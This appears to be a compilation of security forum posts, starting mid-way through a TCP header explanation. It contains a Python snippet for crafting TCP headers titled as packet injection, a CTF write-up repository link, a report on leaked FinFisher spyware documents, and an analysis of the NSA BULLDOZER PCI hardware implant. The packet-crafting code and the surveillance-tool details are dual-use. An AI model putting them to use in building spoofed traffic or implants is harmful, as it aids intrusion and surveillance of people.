    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |           Checksum            |        Urgent Pointer         |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                    Options                    |    Padding    |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                             data                              |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Sequence Number (32 bits): the sequence number of the first data byte in this segment.
If the SYN flag is set, the sequence number is the initial sequence number (ISN), and the first data byte in the stream is numbered ISN+1.

Acknowledgment Number (32 bits): if the ACK flag is set, this field contains the value of the next sequence number the destination machine is expecting to receive. For every packet containing data that is sent, an acknowledgment packet should be received, confirming that the last packet arrived successfully.

Data Offset (4 bits): the length of the TCP header, given as a number of 32-bit words. This indicates where the data begins.

Reserved (6 bits): usually cleared to zero.

Control Bits (6 bits):
ACK: Acknowledgment packet
SYN: Request to establish a connection
RST: Request to reset a connection
FIN: Request to interrupt (close) a connection
PSH: Informs TCP that data should be sent immediately (useful in real-time applications)
URG: Urgent Pointer field is significant

Window: the number of data bytes that may be sent before the sender should stop and wait for an acknowledgement.

Checksum: used for error-checking of the header and data.

Urgent Pointer: if the URG control flag is set, this field is an offset from the sequence number indicating the last urgent data byte. This feature is used when some information has to reach its destination as soon as possible.

Articol: TCP Packet Injection with Python | Python for Pentesting
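The 20-byte header laid out above maps directly onto a struct.pack() format string. A hedged sketch of packing it (the port and window values are arbitrary examples; real injection additionally requires the checksum to be computed over an IP pseudo-header and the result sent through a raw socket, which needs root privileges):

```python
import struct

def checksum(data):
    # Internet checksum: one's-complement sum of big-endian 16-bit words,
    # folding any carry back into the low 16 bits.
    if len(data) % 2:
        data += b'\x00'
    s = sum(struct.unpack('!%dH' % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xffff) + (s >> 16)
    return ~s & 0xffff

def tcp_header(src_port, dst_port, seq=0, ack_seq=0, flags=0x02, window=5840):
    # '!HHLLBBHHH': source port, destination port, sequence number,
    # acknowledgment number, data offset/reserved, flags, window,
    # checksum, urgent pointer -- all in network byte order.
    offset_res = 5 << 4   # data offset of 5 words (no options), reserved 0
    return struct.pack('!HHLLBBHHH', src_port, dst_port, seq, ack_seq,
                       offset_res, flags, window,
                       0,   # checksum placeholder, spliced in later
                       0)   # urgent pointer

hdr = tcp_header(1234, 80)   # a SYN (flags=0x02) from port 1234 to port 80
assert len(hdr) == 20
```

Once the pseudo-header checksum is computed, it is written back over bytes 16-17 of this buffer before the segment is handed to the raw socket.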
  4. [h=1]CTF write-ups[/h] There are some problems with CTF write-ups in general:
- they’re scattered across the interwebs
- they don’t usually include the original files needed to solve the challenge
- some of them are incomplete or skip ‘obvious’ parts of the explanation, and are therefore not as helpful for newcomers
- often they disappear when the owner forgets to renew their domain or shuts down their blog

This repository aims to solve those problems. It’s a collection of CTF source files and write-ups that anyone can contribute to. Did you just publish a CTF write-up? Let us know, and we’ll add a link to your post — or just add the link yourself and submit a pull request. Spot an issue with a solution? Correct it, and send a pull request.

Link: https://github.com/ctfs/write-ups
  5. Six things we know from the latest FinFisher documents

By: Kenneth Page on: 15-Aug-2014

The publishing of materials from a support server belonging to surveillance-industry giant Gamma International has provided a trove of information for technologists, security researchers and activists. It has given the world direct insight into a tight-knit industry that demands secrecy for itself and its clients, but ultimately assists in the violation of the human rights of ordinary people without care or reproach. Now, for the first time, there is solid confirmation of Gamma's activities from inside the company's own files, despite its denials, on its clients and the support provided to a range of governments.

The Anglo-German company Gamma International is widely known for the intrusion software suite FinFisher, which was spun off into its own German-based company, "FinFisher GmbH", sometime in 2013. The 40GB dump of internal documents, brochures, pricelists, logs, and support queries was made available through a torrent first linked to in a Reddit post by the alleged hacker, who also set up a Twitter handle posting the documents. While these documents do provide insight into FinFisher, Privacy International does not support any attempt to compromise the security of any company's network or servers. Greater transparency is needed from this sector, and from governments, to ensure that every business's obligation to respect human rights is met.

Some documents provide new information; others support and verify previous claims about the company. Privacy International is still reviewing and analysing all the documents, so we expect more information to come out of them in the near future.

1. No targeting of Germany

FinFisher's command and control servers have been found in nearly 40 countries around the world.
But these new documents reveal that customers cannot use FinFisher products to target devices in Germany, according to a clause contained within what appears to be a generic commercial offer the company provides to all its customers. Article 21 of a commercial offer states:

The BUYER hereby acknowledges that it is a strict term of this supply contract that it will not use the articles supplied in obtaining any data or software from any computer or related devices or impairing or interfering in the operation of any computer where, in either such case, there is significant link (however arising) in relation to such action or on relation to any other relevant circumstances, with Germany and hereby undertakes and warrants to FinFisher that it will not make use of the articles supplied

It is an odd clause to be contained within an offer. FinFisher is designed to work on a target machine regardless of location; a key selling point of FinFisher is the ability to monitor a target anywhere in the world. It is unclear why the buyer is specifically banned from using FinFisher to target devices in Germany, but there are a couple of reasonable possibilities. The first is that it is a condition imposed by the German government, allowing FinFisher to be based in and exported from Germany only if it is not used against German targets. It is also possible that FinFisher itself is looking to minimize any attention it gets in Germany, be it from security agencies or the press. It could also be a legal precaution related to computer misuse legislation, designed to minimize legal accountability. Privacy International has written to the German Federal Office for Economic Affairs and Export Control (BAFA) asking for clarification, and to assess whether the German government requires or is aware of such a clause prohibiting the targeting of German devices using German-made surveillance technology exported out of the country.

2.
The targeting of activists

The Gamma documents also cast doubt on the company's previous claims that the Bahraini Government used a stolen demonstration copy of FinFisher against pro-democracy activists. Excellent work by Bahrain Watch signals that the Bahraini Government had reportedly targeted a range of prominent Bahraini lawyers, human rights workers, and politicians. Zeroing in on specific information related to Bahrain, the group claims to have identified 77 computers of activists targeted by FinFisher. It was the 2012 allegations and technical analysis, showing that Gamma's products were used to spy on Bahraini pro-democracy activists, that first revealed the truly invasive implications and violations associated with this technology.

This new, potentially damning evidence comes in the form of the communications revealed between the supposed Bahraini authorities and Gamma's support service, again an element of the company's comprehensive support package. Logs show requests for assistance in solving problems occurring in the deployment of the malware, including that some anti-virus programs were detecting its presence, login details were not working, the 'targets' were not appearing, and so on. These documents and the subsequent analysis by Bahrain Watch give credence to long-suspected behaviour of the Bahraini Government when it comes to targeting activists with FinFisher, and call into question Gamma's previous statements on its relationship with Bahrain. Several of the individuals identified by Bahrain Watch are now either imprisoned or sentenced in absentia, showing the on-the-ground impact and role of surveillance technologies in the hands of repressive regimes.

3. The industry is slick

Once a negligible industry in 2001, within ten years the sector was estimated to be worth approximately $5 billion annually, and growing by 20% every year.
By the end of 2014, ISS World (the so-called 'Wiretappers' Ball') will have held trade fairs in Washington DC, Prague, Brasilia, Johannesburg, Dubai and Kuala Lumpur, reflecting how the industry has stretched its tentacles to all corners of the world, selling to essentially any and all governments who deem its tools 'necessary'. The Gamma documents show the company's attendance at multiple exhibitions, extending beyond ISS World into specialised security and defence exhibitions, including the "Security and Policing" fair in Farnborough, UK, the "LAAD Defence and Security Expo" in Rio, and "FBI Executives Training" in San Antonio, Texas, amongst others.

What is noticeable is not merely the provision of software and hardware, much of which was already known to those active in the area, but the sense of the industry becoming 'established' and attempting to operate like any other normal international business. The latest Gamma brochures and presentations show the slicker side of the company and can be taken as representative of the modern industry: a highly professionalised sector with PR and marketing language directed at law enforcement and government agencies, presenting surveillance products as the comprehensive solution to any tricky problem. Paying attention to 'the little things' is a sign of a well-established and professional sector, and Gamma displays this in one of its trade fair attendance spreadsheets detailing which member of staff was due to send follow-up emails to interested individuals afterwards.

4. They do more than just sell

We've previously shown how surveillance companies do not only sell the products found in these brochures. Beyond developing and marketing, companies like Gamma provide an extensive consulting service, helping install the equipment, getting surveillance teams up and running, and lending IT support for any technical problems the software encounters.
The provision of services beyond merely supplying the initial software or hardware is strikingly illuminated by these new documents, which show first-hand evidence of the technical and customer support offered to clients. Specifically, the new documents say that the products are subject to regular updates due to technical advances, "therefore an annual support contract is required to received such upgrades and updates" [FF License Renewal Template 23.01.14]. Similarly, in the leaked pricelist, line entries show charges for post-sales support and update licences for up to 5 years, showing a consistent support mechanism for the client.

The training documents detail the depth of the training given by Gamma employees to their government clients. For example, with the FinIntrusion Kit 2.2, clients are trained how to conduct network intrusion, how to search for and identify victims, break WEP and WPA encryption, jam wireless networks, and extract usernames and passwords for everyday services like Gmail, Hotmail, and Facebook. When it comes to training governments on how to use their malware, the Gamma documents show how quickly they can get authorities up and running on the surveillance equipment: a basic intrusion course takes five days, while an extended course needs 10 days.

5. Relationships with other companies

The symbiotic relationships between the leading firms have long been suspected, and small elements of this collusion have been revealed previously. Gamma International has been shown to have worked hand-in-glove with two Swiss companies, Dreamlab and Elaman, supplying surveillance equipment to regimes such as Turkmenistan. These new Gamma documents confirm this is an established business partnership, revealing the role of both Swiss-based companies in reselling Gamma's products and training clients in the field. Other documents show that the new FinFisher company and Elaman even share the same address.
The training price-lists show the cooperation between these three distinct companies. If a government purchases a Gamma product from Elaman, it would receive a discount of 25% on software and support, while a discount of 15% is on offer for hardware and training, according to the pricelist. A slightly less generous discount of 20% and 10% is on offer for other agents and resellers, demonstrating the widespread partnerships throughout the industry. Alongside the training services offered by Gamma, it is noticeable that they advertise the capabilities of the trainers from Dreamlab, who clearly come highly recommended for their knowledge of infrastructure, as they command five times the salary of a Gamma staff member for in-country training.

Through an examination of the line-by-line price-list, we see a window into the range and cost of services on offer. The breakdown shows wholly customisable services for the client: activation licences for FinSpy Mobile targeting Blackberry, Windows Mobile, iPhone, Symbian and Android; licences for After Sales Support and Updates for up to 3 years; user manuals; desktop workstations; specific laptops; as well as a critical evolution in the industry, access to the 'Exploit Portal' of French vulnerability developer VUPEN.

We've highlighted in the past Gamma's role in pushing 0-day exploits, and VUPEN's role in this market. Ties between VUPEN and Gamma/FinFisher have long been public and friendly, but the pricelist and documents confirm a business relationship between governments, Gamma, and VUPEN's large database of exploits. In this transaction, VUPEN sells exploits to be used in the FinSpy exploit portal, which Gamma/FinFisher then turn around and sell to their customers. A Frequently Asked Questions document within the Gamma documents shows that the company, when selling exploits, is apparently often asked where the vulnerabilities come from. "Q: Can we name the supplier?
A: Yes you can mention that we work with VUPEN here."

We can now compare two pricelists from Gamma: the 2011 release and the new one. In 2011, a FinSpy Relay, Master, and Generation Licence for between one and 10 targets cost a government €100,000. By the end of 2013 we see a whopping 20% increase, with the same service now costing €120,000. The FinSpy PC Activation licence covered Windows and OS X at a cost of €1,950; by 2013 this had increased to €2,340, with licences for Linux now included.

6. The technology has evolved

FinFisher, which takes complete control over a target's device once infected, came to international prominence in 2011 when documents uncovered in the aftermath of the Arab Spring showed its use by the Egyptian security services. The same year saw Wikileaks' SpyFiles 2 release, comprising various documents including training videos for Gamma's products such as FinSpy Mobile, FinUSB, and FinFly. Subsequent publications of brochures in SpyFiles 3 and our own Surveillance Industry Index continued to document what the company is selling.

Gamma itself describes its prospective clients as ranging from intelligence agencies and air force, navy and army groups to customs departments and presidential guards. This sophisticated clientele demands cutting-edge solutions and technology that is consistently evolving and progressing. The Gamma documents show this evolution, through constant communication with clients about forthcoming enhancements and versions with better capabilities. The presentations and training documents show the progression of intrusion techniques, pushing past 'traditional passive monitoring' for problems 'that can only be solved by adding IT intrusion solutions'. Gamma itself highlights the 'global mobility of devices and targets' as a problem that needs to be 'solved', as well as anonymity through the use of hotspots, proxies, and webmail, also referencing Tor.
The provision of 'roadmaps' shows clients when updates for their purchases will be available, and details the features of the new versions. For example, these roadmaps reveal new versions and enhancements of the invasive FinSpy Mobile. Version 4.4, released in Q4 2012, has the ability to collect data through Skype across iOS, Blackberry, Android, and Windows Mobile platforms. An updated Version 4.5, released in Q1 2013, included the ability to target emails, calendars and keylogging on Windows Phones, and an updated ability to collect data through the camera of a Blackberry or iOS phone.

It is important to add that more analysis will be needed to fully piece together and chart the progress of Gamma intrusion software. As we continue to analyse these documents, we will publish more information.

Source: https://www.privacyinternational.org/blog/six-things-we-know-from-the-latest-finfisher-documents
  6. This article is the second part of a series on NSA BIOS backdoor internals. This part focuses on BULLDOZER, a hardware implant acting as a malware dropper and wireless communication "hub" for NSA covert operations. Although BULLDOZER is hardware, I still use the word "malware" when referring to it, because it is malicious hardware. Perhaps the term "malware" should refer to both malicious software and malicious hardware, instead of only the former.

I'd like to point out why BULLDOZER is classified as "god mode" malware. Unlike DEITYBOUNCE, BULLDOZER is not a name from the realm of the "gods". However, BULLDOZER provides capabilities similar to a "god mode" cheat in video games, which makes the player using it close to invincible, to its payload, GINSU. Therefore, it is still suitable to be called god mode malware. The presence of BULLDOZER is very hard to detect, even with the most sophisticated anti-malware tools available during its possible deployment timeframe. As for GINSU, we will look into it in detail in the next installment of this series.

The NSA ANT server document, leaked by Edward Snowden, describes BULLDOZER briefly. This article presents an analysis of BULLDOZER based on the technical implications of the information provided by the NSA document. Despite lacking many technical details, we can still draw a technically sound analysis of BULLDOZER based on the BIOS and hardware technology of the day BULLDOZER became operational, just as in the DEITYBOUNCE case.

Introduction to the GINSU-BULLDOZER Malware Combo

BULLDOZER doesn't work in isolation. It has to be paired with the GINSU malware to work. As you will see in the next installment of this series, GINSU is a malicious PCI expansion ROM. Therefore, at this point, let's just assume that GINSU is indeed a malicious PCI expansion ROM and BULLDOZER is the hardware where GINSU runs.
This means BULLDOZER is a PCI add-in card, which is in line with the information in the NSA ANT server document. Before we proceed to analyze BULLDOZER, let's look at the context in which BULLDOZER and GINSU work. GINSU and BULLDOZER are a software and hardware combo that must be present at the same time to work. We need to look at the context in which they operate in order to understand their inner workings. Figure 1 shows the deployment of GINSU and BULLDOZER in the target network.

Figure 1 GINSU Extended Concept of Operations. Courtesy: NSA ANT Product Data

Figure 1 shows the BULLDOZER hardware implanted in one of the machines in the target network. The NSA Remote Operation Center (ROC) communicates via OMNIGAT with the exploited machine through an unspecified wireless network. This implies the GINSU-BULLDOZER malware combo targets machines in air-gapped networks, or machines located in a network that is hard, but not impossible, to penetrate. In the latter case, using machines with malware-implanted hardware is more economical and/or stealthier than an "ordinary" computer network intrusion approach.

Let's look closer at the technical information revealed by the NSA ANT product data document before we proceed to deeper technical analysis. The NSA ANT server product data document mentions:

GINSU provides software application persistence for the Computer Network Exploitation (CNE) implant, codenamed KONGUR, on systems with the PCI bus hardware implant, BULLDOZER.

The technique supports any desktop PC system that contains at least one PCI connector (slot) and uses Microsoft Windows 9x, 2000, 2003 server, XP, or Vista. The PCI slot is required for the BULLDOZER hardware implant installation.

BULLDOZER is installed in the target system as a PCI hardware implant through "interdiction", a fancy word for installing additional hardware in the target system while it is being shipped to its destination.
After fielding, if KONGUR is removed from the system as a result of an operating system upgrade or reinstallation, GINSU can be set to trigger on the next reboot of the system to restore the software implant.

It is clear from the four points of information above and from Figure 1 that there are three different components in the GINSU-BULLDOZER combo. They are as follows:

The first component is GINSU. The GINSU code name is actually rather funny because it refers to a knife that was very popular in the 1980s and 1990s via direct-sell marketing. Perhaps the creator of the GINSU malware was alluding to the Ginsu knife's above-average capability to cut through various materials. GINSU is possibly a malicious PCI expansion ROM (PCI expansion ROM is also called PCI option ROM in many PCI-related specifications; I will use both terms in this article). GINSU might share some modules with DEITYBOUNCE, because both are malicious PCI expansion ROMs (see the DEITYBOUNCE analysis at NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute). However, it differs in many other aspects. First, GINSU runs on the NSA custom PCI add-in card codenamed BULLDOZER. Therefore, GINSU could be much larger than DEITYBOUNCE, because the NSA controls the size of the flash ROM on the PCI add-in card. This means GINSU could incorporate many more functions than DEITYBOUNCE. Second is the type of PCI add-in card that GINSU might use. From Figure 1, the GINSU hardware (BULLDOZER) seems to masquerade as a WLAN PCI add-in card or another kind of PCI add-in card for wireless communication. This implies that the PCI class code of the BULLDOZER hardware that contains GINSU is probably not a PCI mass storage controller like the one used by DEITYBOUNCE. Instead, the BULLDOZER PCI chip very possibly uses a PCI wireless controller class code.

The second component is named BULLDOZER.
This codename perhaps refers to the capability of a bulldozer to push large quantities of material to its intended place, which in the context of GINSU is the capability to push the final payload (KONGUR) onto the target systems. In this particular malware context, BULLDOZER refers to the PCI add-in card (hardware) implant installed in the target machine. BULLDOZER is a custom PCI add-in card. It very probably masquerades as a PCI WLAN add-in card because it provides a wireless communication function that requires a certain kind of antenna. This doesn't prevent BULLDOZER from masquerading as another kind of PCI add-in card, but the presence of a physically larger antenna in a PCI WLAN card could boost the wireless signal strength. Therefore, the NSA might use the PCI WLAN card form factor to its advantage. We will look deeper into the BULLDOZER implementation later.

The third (and last) component is named KONGUR. KONGUR is a somewhat mysterious name. It may refer to Kongur Tagh mountain in China's Xinjiang-Uyghur Autonomous Region. This could possibly mean that the GINSU-BULLDOZER combo was devised for a campaign to infiltrate Chinese computer systems. After all, the Xinjiang-Uyghur Autonomous Region is famous for its people's rebellion against the Chinese central government. This doesn't mean that the GINSU-BULLDOZER combo wasn't used against other targets in other campaigns, though. KONGUR is Windows malware that targets Windows 9x, 2000, XP, Server 2003 and Vista. GINSU provides the delivery and reinstallation mechanism for KONGUR. We can view KONGUR as the payload of the GINSU-BULLDOZER combo. It is possible that KONGUR also works on Windows Vista derivatives, such as Windows 7 and Windows Server 2008, or even later Microsoft operating systems (OS), such as Windows 8, Server 2012, and 8.1, because KONGUR targets Windows Vista and we don't know which 0-day exploit it uses or whether that exploit has since been patched.
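Since the combo hinges on a malicious PCI expansion ROM, it helps to recall what a well-formed option ROM image looks like. The sketch below is mine, not the article's, and the vendor/device IDs are invented for illustration. It builds a synthetic ROM image and parses the standard header defined by the PCI specifications: the 0x55AA signature, the size byte at offset 2, and the 16-bit pointer at offset 0x18 to the "PCIR" data structure, which carries the vendor/device IDs and the class code a BIOS checks before executing the ROM.

```python
import struct

def parse_option_rom(rom: bytes) -> dict:
    # Standard PCI expansion ROM header: bytes 0-1 hold the 0x55 0xAA
    # signature, byte 2 the image size in 512-byte units, and the
    # little-endian word at 0x18 the offset of the PCIR data structure.
    if rom[0:2] != b"\x55\xaa":
        raise ValueError("missing 55 AA option ROM signature")
    size = rom[2] * 512
    pcir = struct.unpack_from("<H", rom, 0x18)[0]
    sig, vendor, device = struct.unpack_from("<4sHH", rom, pcir)
    if sig != b"PCIR":
        raise ValueError("PCIR data structure not found")
    # Class code: 3 bytes at PCIR offset 0x0D (prog-if, sub-class, base class)
    class_code = rom[pcir + 0x0D : pcir + 0x10]
    return {"size": size, "vendor": vendor, "device": device,
            "class_code": class_code.hex()}

# Build a synthetic 512-byte image with a made-up vendor/device pair
# and a network-controller class code (base class 0x02), the kind of
# identity a wireless-masquerading card would present.
rom = bytearray(512)
rom[0:2] = b"\x55\xaa"
rom[2] = 1                                   # 1 * 512 bytes
struct.pack_into("<H", rom, 0x18, 0x1C)      # PCIR structure at offset 0x1C
struct.pack_into("<4sHH", rom, 0x1C, b"PCIR", 0x1814, 0x0301)
rom[0x1C + 0x0D : 0x1C + 0x10] = bytes([0x00, 0x80, 0x02])
print(parse_option_rom(bytes(rom)))
```

The point of the sketch is that nothing in this header distinguishes a benign ROM from a malicious one; a BULLDOZER-style card simply has to present plausible values here.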
This article doesn't delve deeply into KONGUR and GINSU; the focus is on the hardware delivery mechanism, the BULLDOZER implant. The GINSU-BULLDOZER malware combo is the second NSA BIOS malware we have looked into that "abuses" the PCI expansion ROM, after DEITYBOUNCE. We could say that the NSA is quite fond of this technique. Though, as you will see later, it is a justified fondness. This hypothesis on the GINSU-BULLDOZER combo is bound to have subtle inaccuracies, because I have no sample of the malware combo to back up my assertions. I am very open to constructive criticism in this regard.

Now we are going to look into the BULLDOZER technical details. However, if you are not yet familiar with the PCI bus protocol, please read the first part of this series (NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute). There are links in that article that further break down the required prerequisite knowledge, in case you are not up to speed yet.

BULLDOZER: NSA Malicious PCI Add-In Card

In this section we delve into the details of the procedures the NSA probably carried out to create the BULLDOZER hardware implant. Surely, the exact type of hardware used by the NSA may very well be different. However, I try to draw the closest analogy possible from the public-domain knowledge base. Despite the NSA's superiority compared to the private sector, all of us are bound by the laws of physics and must adhere to the hardware protocols of the target systems. Therefore, the NSA's approach to building BULLDOZER couldn't be that much different from the explanation in this article. In the BULLDOZER Implementation Recap section, I try to draw the most logical hypotheses on the BULLDOZER hardware implant, based on the explanation of the process of designing and creating a PCI add-in card similar to BULLDOZER.

PCI add-in cards are installed in PCI expansion slots on the motherboard. Figure 2 shows a PCI add-in card sample.
This PCI add-in card is a PCI WLAN card. Figure 2 highlights the PCI "controller" chip from Ralink (a WLAN controller) and the PCI slot connector on the add-in card. The term "controller" is a generic name given to a chip that implements the core function of a PCI add-in card. PCI hardware development documentation typically uses this term, as do PCI-related specifications.

Figure 2 PCI add-in card sample. Courtesy: D-Link.

I use a PCI WLAN card as an example because the GINSU extended concept of operations implies that the BULLDOZER hardware implant is a PCI wireless controller card. As to what kind of wireless protocol it uses, we don't know. But the point is, BULLDOZER could masquerade as a PCI WLAN card for maximum stealth. It would look innocuous that way. Figure 2 doesn't show the presence of any flash ROM on the PCI add-in card. A PCI add-in card typically stores its PCI option ROM code in flash ROM. The purpose of Figure 2 is just to show you the typical appearance of a PCI add-in card for wireless communications. We'll get into the flash ROM stuff later on.

PCI Add-In Card in an OEM Desktop PC Circa 2008

Now, let's look at how a typical 2008 desktop PC could be implanted with such a card. One of the desktop PCs from a system builder that still had PCI slots in 2008 is the Lenovo ThinkCentre M57 desktop PC. I chose a Lenovo desktop PC as an example because its products were widely used in China, besides other parts of the world. It could probably be one of the victims of the GINSU-BULLDOZER campaign. Who knows? The Lenovo ThinkCentre M57 has two PCI slots. Let's say the NSA "interdicts" such a system. They can install BULLDOZER in it and then replace the user guide as well, to make the BULLDOZER implant look like a legitimate PCI add-in card that comes with the PC, in case the user checks the manual before using the system.
Figure 3 Lenovo ThinkCentre M57 PCI Add-In Card Replacement Instructions (edited version of the original ThinkCentre Hardware Maintenance Manual instructions). Courtesy: Lenovo.

The Lenovo ThinkCentre Hardware Maintenance Manual even comes with instructions for replacing a failed PCI add-in card. Figure 3 shows the instructions in an "exploded view" style. The hardware replacement shown in Figure 3 is a pedestrian task; any NSA field agent could do it.

PCI Wireless Communication Add-In Card Hardware and Software Co-Development

Now, let's look at the steps to develop a PCI wireless communication add-in card in general, because we presume that BULLDOZER falls within this PCI add-in card category. I'm quite sure the NSA also follows the approach explained here, despite being a very advanced spying agency. Only the tools and hardware it uses are probably different, perhaps custom-made. From a cost point of view, using a Commercial Off-The-Shelf (COTS) approach to creating the BULLDOZER hardware would be more cost-effective: tools already on the market cost much less than custom tools. COTS benefits from economies of scale and from competition in the market, compared to custom tools. Moreover, from an operational standpoint, the GINSU-BULLDOZER target systems would likely evolve within five years, which dictates the use of new tools. Therefore obsolescence, which usually plagues COTS solutions, is not a problem in the GINSU-BULLDOZER campaign. The latter fact strengthens my suspicion that the NSA very probably used the COTS approach. We'll look at this COTS approach shortly.

The "crude" steps to develop a PCI add-in card and its assorted software in general, via the COTS approach, are as follows:

1. High-level design. This step involves the high-level decisions on what kind of PCI controller chip would be created for the PCI add-in card, what features the chip would implement, and what auxiliary support chip(s) are required.
For example, in the case of a PCI wireless communication add-in card, you will typically need a separate Digital Signal Processor (DSP) chip, or you need to buy the DSP logic design from a DSP vendor and incorporate that design into your PCI Field-Programmable Gate Array (FPGA).

2. Hardware prototyping. This step involves creating the PCI controller chip prototype with a PCI FPGA development board. Typically, the language used to develop the PCI controller chip in the FPGA is either VHDL or Verilog. This mostly depends on the FPGA vendor.

3. Software (device driver) development. This step involves creating a prototype device driver for the PCI add-in card for the target operating system (OS). For example, if the device will be marketed mostly to Windows users, then creating a Windows device driver takes priority. Drivers for other target OSes would be developed later, or possibly not at all if market demand for the alternative OS doesn't justify the cost of developing the driver. This step is typically carried out in parallel with hardware prototyping, once the first iteration of the FPGA version of the chip is available. Some FPGA vendors provide a "template" driver for certain target OSes to help with driver development. This way, driver development can run in parallel with the chip design. There are also third-party "driver template" vendors that are endorsed by the FPGA vendors, such as Jungo WinDriver (see http://www.jungo.com/st/products/windriver/).

4. Chip fabrication, also known as the making of the Application-Specific Integrated Circuit (ASIC). In this step, the first design revision of the chip is finished and the design is sent to a chip fabrication plant, such as TSMC, UMC, or another contract semiconductor fab. This is an optional step, though, because some low-volume PCI add-in cards these days are made out of FPGAs anyway.
If the cost of chip fabrication doesn't make economic sense compared to building the product out of an FPGA, then the final product simply uses the FPGA. The NSA has several semiconductor fabs (for example, see NSA plant in San Antonio shrouded in secrecy - Houston Chronicle). One of the NSA's fabs was probably used to fabricate the BULLDOZER PCI controller chip.

5. Compatibility testing of the PCI hardware-software "combo". The chip vendor carries out the compatibility testing first. If the target OS is Windows, Microsoft also carries out additional compatibility testing, the so-called WHQL testing. WHQL stands for Windows Hardware Quality Labs. WHQL testing is Microsoft's testing process, which involves running a series of tests on third-party hardware or software and then submitting the log files from these tests to Microsoft for review. If the primary target OS is not Windows, only the hardware vendor's tests are carried out. The NSA very probably also carries out this kind of testing, but for an entirely different purpose, i.e. to make sure the driver works as stealthily as possible, or to mislead the user into thinking the driver is just an ordinary PCI device driver.

Steps 2 and 3 are actually iterative. The PCI hardware prototype goes through several iterations until it matures and is ready for fabrication. Step 4 can also be iterative, i.e. there can be several revisions of the chip. The first revision might have a flaw or performance weakness that must be improved, despite being a functional design. In the commercial world, ASICs typically go through several revisions. Each revision is marked as a "stepping". You will find the word "stepping" mentioned in much CPU, chipset, and System-on-Chip (SoC) technical documentation.

"Simulating" BULLDOZER Hardware

Now, let's look into the process of developing a specific kind of PCI add-in card, i.e.
a PCI add-in card with wireless communication as its primary function. We focus on this kind of PCI add-in card because BULLDOZER connects to the outside world—to OMNIGAT in Figure 1—via an unspecified wireless connection. For this purpose, we look into the hardware prototyping step in more detail. Let’s start with some important design decisions needed to emulate BULLDOZER’s capabilities, as follows:

- The prototype must have the hardware required to develop a custom wireless communication protocol. The reason is that the wireless communication protocol used by BULLDOZER to communicate with OMNIGAT must be as stealthy as possible, despite probably using the same physical antenna as a PCI WLAN card.

- The prototype must implement PCI expansion ROM hardware. The reason is that GINSU is malicious PCI expansion ROM code which must be stored in a functional PCI expansion ROM chip to work.

- GINSU is configurable, or at the very least it can be optionally triggered—based on the NSA ANT server document. This means there must be some sort of non-volatile memory in the prototype to store GINSU parameters. It could be in the form of a Non-Volatile RAM (NVRAM) chip, as in the DEITYBOUNCE case. Storing the configuration data in a flash ROM or another kind of ROM is quite unlikely, given that flash ROM requires a rather complicated procedure to rewrite.

The next step is to choose the prototyping kit for the hardware. There are many PCI FPGA prototyping boards on the market. We will look into one of them from Sundance (DSP and FPGA Solutions - Sundance Multiprocessor Technology Ltd.). Sundance is probably a very obscure vendor to you. However, it is one of the vendors that provide a PCI development board for Software-Defined Radio (SDR) applications. You might be asking: why would I pick a PCI SDR development board as an example? The reason is simple: SDR is the best approach when you want to develop your own wireless protocol.
You can tune the frequency, the type of modulation, the transmitter power profile, and the other parameters needed to make the protocol as stealthy as possible.

BULLDOZER Hardware “Simulation” with the Sundance SMT8096 SDR Development Kit

There is usually more than one FPGA in a typical PCI SDR development board. We are going to look into one of Sundance’s products that was available on the market before 2008—the year the GINSU-BULLDOZER malware combo became operational. I picked the Sundance SMT8096 SDR development kit as the example in this article. This kit was available on the market circa 2005. The kit consists of several connected boards, with a “PCI carrier” board acting as the host of all of the connected boards. The PCI carrier board connects the entire kit to the PCI slot in the development PC. Figure 4 shows the entire Sundance SMT8096 SDR development kit hardware.

Figure 4 Sundance SMT8096 SDR development kit. Courtesy: Sundance Multiprocessor Technology Ltd.

Figure 4 shows the components of the Sundance SMT8096 SDR development kit. As you can see, the development kit consists of several circuit boards, as follows:

- The SMT395-VP30 board, which contains the Texas Instruments TI DSP C6416T chip and the Xilinx Virtex-II Pro FPGA. The TI DSP C6416T chip provides the primary signal processing in the development kit, while the Virtex-II FPGA provides the reconfigurable signal processing part. Actually, it’s the FPGA on this board that provides the “software” in the “software-defined” part of the SDR abbreviation.

- The SMT350 board, which provides the Analog-to-Digital Converter (ADC) / Digital-to-Analog Converter (DAC) functions. This board provides two functions. First, it receives the analog input from the input antenna and then converts that input into its equivalent digital representation before feeding the result to the signal processing board.
Second, it receives the digital output of the signal processing board and converts that digital signal into an analog signal to be fed into the output antenna. The input and output antenna could be the same or different, depending on the overall design of the SDR solution.

- The SMT368 board, which provides yet another FPGA, a Xilinx Virtex-4 SX35. This board provides the “protocol/data-format” conversion function, as you can see in Figure 5 (the Sundance SMT8096 SDR development kit block diagram).

- SMT310Q, the PCI carrier board. It’s this board that connects to the host (desktop PC) motherboard via the PCI connector. This board provides the PCI logical and physical interface into the host PC.

Figure 5 shows the block diagram of the entire SDR development kit. It helps in understanding the interactions between the SDR development kit components.

Figure 5 Sundance SMT8096 Development Kit Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd.

Let’s look into the SMT310Q PCI carrier board, because this board is the one visible from the motherboard BIOS perspective. We’ll focus on the technology required to communicate with the host PC instead of the technology required for the wireless communication, because we have no further clues on the latter. Moreover, I’m not an expert in radio communication technology in any way. The SMT310Q PCI carrier board has a QuickLogic V363EPC PCI bridge chip, which conforms to the PCI 2.1 specification. This chip was developed by V3 Semiconductor before the company was bought by QuickLogic. The V363EPC PCI bridge connects the devices on the SMT8096 development kit to the host PC motherboard—both logically and electrically—via the PCI slot connector. This PCI bridge chip is not a PCI-to-PCI bridge; rather, it’s a bridge between the custom bus used in the SMT8096 development kit and the PCI bus in the host PC. The correct term is Local Bus to PCI Bridge.
